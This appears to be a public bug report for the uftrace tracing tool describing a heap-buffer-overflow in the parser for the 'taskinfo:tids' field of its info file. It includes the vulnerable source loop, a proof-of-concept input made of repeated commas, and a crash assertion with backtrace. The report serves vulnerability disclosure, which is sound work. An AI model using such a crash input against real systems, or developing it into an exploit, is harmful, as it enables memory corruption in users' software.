Open
Hello,
I found a heap-buffer-overflow bug.
If there is a large amount of data (a long run of `,` separators) in the `taskinfo:tids` field of the `info` file, the parser falls into an infinite loop. The loop stores each parsed value with `tids[nr_tid++] = tid` without checking `nr_tid` against the expected count (the `nr_tid == info->nr_tid` assertion only runs after the loop), so every extra separator writes one more element past the end of the heap buffer.
Lines 560 to 569 in 2d6c907
while (*endp != '\n') { | |
int tid = strtol(tids_str, &endp, 10); | |
tids[nr_tid++] = tid; | |
if (*endp != ',' && *endp != '\n') { | |
free(tids); | |
goto out; | |
} | |
tids_str = endp + 1; |
PoC:
cat uftrace.data/info
taskinfo:tids=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Crash info:
$ uftrace info
uftrace: malloc.c:2401: sysmalloc: Assertion `(old_top == initial_top (av) && old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top) && ((unsigned long) old_end & (pagesize - 1)) == 0)' fa
$bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007f5b6b557801 in __GI_abort () at abort.c:79
#2 0x00007f5b6b5aaa91 in __malloc_assert (file=<optimized out>, function=<optimized out>, line=<optimized out>, assertion=<optimized out>) at malloc.c:298
#3 sysmalloc (nb=nb@entry=112, av=av@entry=0x7f5b6b902c40 <main_arena>) at malloc.c:2398
#4 0x00007f5b6b5abff0 in _int_malloc (av=av@entry=0x7f5b6b902c40 <main_arena>, bytes=bytes@entry=100) at malloc.c:4125
#5 0x00007f5b6b5ae0fc in __GI___libc_malloc (bytes=100) at malloc.c:3057
#6 0x00007f5b6b59f525 in _IO_vasprintf (result_ptr=0x7ffe0645e6d0, format=0x7f5b6b6ce7d8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", args=args@entry=0x7ffe0645e5c0)
at vasprintf.c:47
#7 0x00007f5b6b57c154 in ___asprintf (string_ptr=string_ptr@entry=0x7ffe0645e6d0, format=format@entry=0x7f5b6b6ce7d8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n")
at asprintf.c:35
#8 0x00007f5b6b5472f4 in __assert_fail_base (fmt=0x7f5b6b6ce7d8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x45b28a "nr_tid == info->nr_tid",
file=file@entry=0x45af00 "/workspace/security/uftrace/cmds/info.c", line=line@entry=576, function=function@entry=0x45ba90 <__PRETTY_FUNCTION__.7725> "read_taskinfo")
at assert.c:57
#9 0x00007f5b6b547412 in __GI___assert_fail (assertion=0x45b28a "nr_tid == info->nr_tid", file=0x45af00 "/workspace/security/uftrace/cmds/info.c", line=576,
function=0x45ba90 <__PRETTY_FUNCTION__.7725> "read_taskinfo") at assert.c:101
#10 0x000000000040c3f6 in read_taskinfo (arg=0x7ffe0645e8b0) at /workspace/security/uftrace/cmds/info.c:576
#11 0x000000000040d6fd in read_uftrace_info (info_mask=15359, handle=0x7ffe064609f0) at /workspace/security/uftrace/cmds/info.c:950
#12 0x000000000042edfc in open_info_file (opts=0x7ffe06460c40, handle=0x7ffe064609f0) at /workspace/security/uftrace/utils/data-file.c:492
#13 0x000000000040e6e9 in command_info (argc=0, argv=0x7ffe06460ea8, opts=0x7ffe06460c40) at /workspace/security/uftrace/cmds/info.c:1212
#14 0x0000000000405ee6 in main (argc=0, argv=0x7ffe06460ea8) at /workspace/security/uftrace/uftrace.c:1171